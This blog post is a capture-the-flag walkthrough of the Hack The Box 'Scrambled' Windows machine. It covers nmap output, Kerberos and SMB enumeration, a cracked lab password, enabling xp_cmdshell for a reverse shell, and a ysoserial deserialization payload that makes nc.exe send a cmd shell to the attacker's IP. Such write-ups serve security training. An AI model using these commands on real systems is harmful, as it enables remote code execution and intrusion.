In this post, I would like to share a walkthrough of the Scrambled Machine from Hack the Box

This room will be considered a Medium machine on Hack The box

What will you gain from the Scrambled machine?

For the user flag, you will need to enumerate by using a lot of Impacket tool. We need to enable_xp_cmdshell on the sql database which we obtain a reverse shell connection. After that, we need to insert the windows command to get another reverse shell connection

As for the root flag, you need to create a base64 code by using ysoserial.exe tool.

Information Gathering on Scrambled Machine

Once we have started the VPN connection which requires a download from Hackthebox, we can start information gathering on the machine by executing the command nmap -sC -sV -p- <IP Address> -PN

# Nmap 7.92 scan initiated Sun Jun 26 02:41:02 2022 as: nmap -sV -sC -oA initial 10.10.11.168
Nmap scan report for 10.10.11.168
Host is up (0.17s latency).
Not shown: 987 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Scramble Corp Intranet
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2022-06-26 06:41:22Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: scrm.local0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC1.scrm.local
| Subject Alternative Name: othername:<unsupported>, DNS:DC1.scrm.local
| Not valid before: 2022-06-09T15:30:57
|_Not valid after:  2023-06-09T15:30:57
|_ssl-date: 2022-06-26T06:42:44+00:00; +2s from scanner time.
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: scrm.local0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC1.scrm.local
| Subject Alternative Name: othername:<unsupported>, DNS:DC1.scrm.local
| Not valid before: 2022-06-09T15:30:57
|_Not valid after:  2023-06-09T15:30:57
|_ssl-date: 2022-06-26T06:42:44+00:00; +2s from scanner time.
1433/tcp open  ms-sql-s      Microsoft SQL Server 2019 15.00.2000.00; RTM
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2022-06-24T12:37:14
|_Not valid after:  2052-06-24T12:37:14
|_ssl-date: 2022-06-26T06:42:44+00:00; +2s from scanner time.
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: scrm.local0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC1.scrm.local
| Subject Alternative Name: othername:<unsupported>, DNS:DC1.scrm.local
| Not valid before: 2022-06-09T15:30:57
|_Not valid after:  2023-06-09T15:30:57
|_ssl-date: 2022-06-26T06:42:44+00:00; +2s from scanner time.
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: scrm.local0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC1.scrm.local
| Subject Alternative Name: othername:<unsupported>, DNS:DC1.scrm.local
| Not valid before: 2022-06-09T15:30:57
|_Not valid after:  2023-06-09T15:30:57
|_ssl-date: 2022-06-26T06:42:43+00:00; +1s from scanner time.
Service Info: Host: DC1; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 1s, deviation: 0s, median: 1s
| ms-sql-info: 
|   10.10.11.168:1433: 
|     Version: 
|       name: Microsoft SQL Server 2019 RTM
|       number: 15.00.2000.00
|       Product: Microsoft SQL Server 2019
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2022-06-26T06:42:08
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Jun 26 02:42:45 2022 -- 1 IP address (1 host up) scanned in 102.69 seconds

Let’s access the website interface

The website interface didn’t show any interesting information that we can abuse.

In another section of the website, I notice that we can see a few errors that appear which look promising.

We have obtained options such as server and port that we can verify with

After roaming inside the website, I notice there was a username that we can take advantage of.

Therefore, let’s try to find the password for the user ksimpson

Enumerate the machine by finding credentials

Sadly, we cannot find any password for the user.

Let’s enumerate the service that running the port 4411

The service that the port use look like an SMB Client service

Let’s update the time on the command above

Enumerate the Scrambled machine using impacket tool

Before we execute the SMBClient service on the machine, let’s create a ticket by using impacket-getTGT

We managed to access it via SMBclient service

I managed to sight that there’s a pdf file called Network Security Changes

As a result, let’s grab the file into our attacker’s machine

Nothing looks interesting on the pdf file.

Let’s find the password and crack it using John The Ripper where it will provide the password as Pegasus60

Let’s execute the secretdump on the machine by using the command above.

Therefore, let’s create another ticket but we need to find a nthash first.

Once the ticket been executed, the ticket will be saved to Administrator.ccache

We also can execute the mssqlclient so that we can enumerate even deeper.

As usual, we can find the information by using the similar SQL command

A few screenshots above show the database enumeration.

We can execute the command such as below:

  • enable_xp_cmdshell
  • reconfigure

Therefore, we can put the reverse shell on the SQL by using the xp_cmdshell command

At last, we got the reverse shell connection back to us.

We need to create a simple shell inside the shell.ps1 file

As we have done with Acute Machine, we can execute the similiar command

The next step would be starting our python proxy server on our attacker’s machine

Finally, we got another reverse shell back to us.

We can read the user flag using the “type user.txt” command

Escalate the Root Privileges Access

After roaming inside the machine, we managed to found a directory (Sales Order Client) which look weird to me.

There’s a two file that we can analyze more further

public void UploadOrder(SalesOrder NewOrder) {
try {
Log.Write("Uploading new order with reference " + NewOrder.ReferenceNumber);
string text = NewOrder.SerializeToBase64();
Log.Write("Order serialized to base64: " + text);
ScrambleNetResponse scrambleNetResponse = this.SendRequestAndGetResponse(new ScrambleNetRequest(ScrambleNetRequest.RequestType.UploadOr ScrambleNetResponse.ResponseType type = scrambleNetResponse.Type;
if (type != ScrambleNetResponse.ResponseType.Success)
{
throw new ApplicationException(scrambleNetResponse.GetErrorDescription());
}Log.Write("Upload successful"); }
catch (Exception expr_5F) {
ProjectData.SetProjectError(expr_5F); Exception ex = expr_5F; Log.Write("Error: " + ex.Message); throw ex;
} }

From the source code above, we are aware that there’s a upload function that we can abuse for further escalation

Let’s download the nc.exe into the machine on C:\Windows\Tasks directory

We can verify that the file exist inside the machine

Howeve, we are required to execute the command such as ./ysoserial.exe -f BinaryFormatter -g WindowsIdentity -c “C:\Windows\Tasks\nc.exe 10.10.14.4 9999 -e cmd” -o base64 on our Windows Operating System.

Sadly, the ysoserial.jar and burp-ysoserial doesn’t work which they will not give us the right output

For us to retrieve back the reverse shell back to us, we need to slam the base64 output on nc scrm.local 4411 connection

After trying for a few day, i have succesfully retrieve the reverse connection back.

We can read the root flag by using the “type root.txt” command

Leave a Reply

Your email address will not be published. Required fields are marked *